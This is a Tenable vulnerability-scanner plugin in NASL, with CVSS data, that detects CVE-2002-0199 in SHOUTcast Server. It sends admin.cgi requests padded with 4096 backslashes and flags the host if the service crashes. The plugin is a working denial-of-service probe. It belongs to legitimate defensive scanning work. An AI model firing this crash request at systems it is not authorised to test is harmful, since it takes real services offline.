CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS
Percentile
90.3%
The remote SHOUTcast Server crashes when an overly large number of backslashes is passed as an argument to its ‘admin.cgi’ script. An unauthenticated, remote attacker can leverage this issue to crash the affected service or possibly even execute arbitrary code on the affected host.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# References:
# Date: Mon, 21 Jan 2002 22:04:58 -0800
# From: "Austin Ensminger" <[email protected]>
# Subject: Re: Shoutcast server 1.8.3 win32
# To: [email protected]
#
# Date: 19 Jan 2002 18:16:49 -0000
# From: "Brian Dittmer" <[email protected]>
# To: [email protected]
# Subject: Shoutcast server 1.8.3 win32
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(11719);
script_version("1.31");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_cve_id("CVE-2002-0199");
script_bugtraq_id(3934);
script_name(english:"SHOUTcast Server admin.cgi Long Argument Overflow");
script_summary(english:"Overflows admin.cgi");
script_set_attribute(attribute:"synopsis", value:
"The remote streaming audio server is vulnerable a buffer overflow
attack.");
script_set_attribute(attribute:"description", value:
"The remote SHOUTcast Server crashes when an overly large number of
backslashes is passed as an argument to its 'admin.cgi' script. An
unauthenticated, remote attacker can leverage this issue to crash the
affected service or possibly even execute arbitrary code on the affected
host.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2002/Jan/255");
script_set_attribute(attribute:"solution", value:"Unknown at this time.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2002/01/19");
script_set_attribute(attribute:"plugin_publication_date", value:"2003/06/11");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:nullsoft:shoutcast_server");
script_end_attributes();
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2003-2021 Tenable Network Security, Inc.");
script_family(english:"CGI abuses");
script_dependencie("http_version.nasl");
script_require_ports("Services/www", 8888);
# Shoutcast is often on a high port
exit(0);
}
# The script code starts here
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default: 8888, embedded: 0);
if (http_is_dead(port: port)) exit(1, "The web server on port "+port+" is already dead");
banner = get_http_banner(port:port);
if (! banner) exit(1, "No HTTP banner on port "+port);
if ("shoutcast" >!< tolower(banner) )
exit(0, "The web server on port "+port+" is not Shoutcast");
u = strcat("/admin.cgi?pass=", crap(length:4096, data:"\"));
w = http_send_recv3(method:"GET", item: u, port:port);
u = strcat("/admin.cgi?", crap(length:4096, data:"\"));
w = http_send_recv3(method:"GET", item: u, port:port);
if (http_is_dead(port: port))
{
security_hole(port: port);
exit(0);
}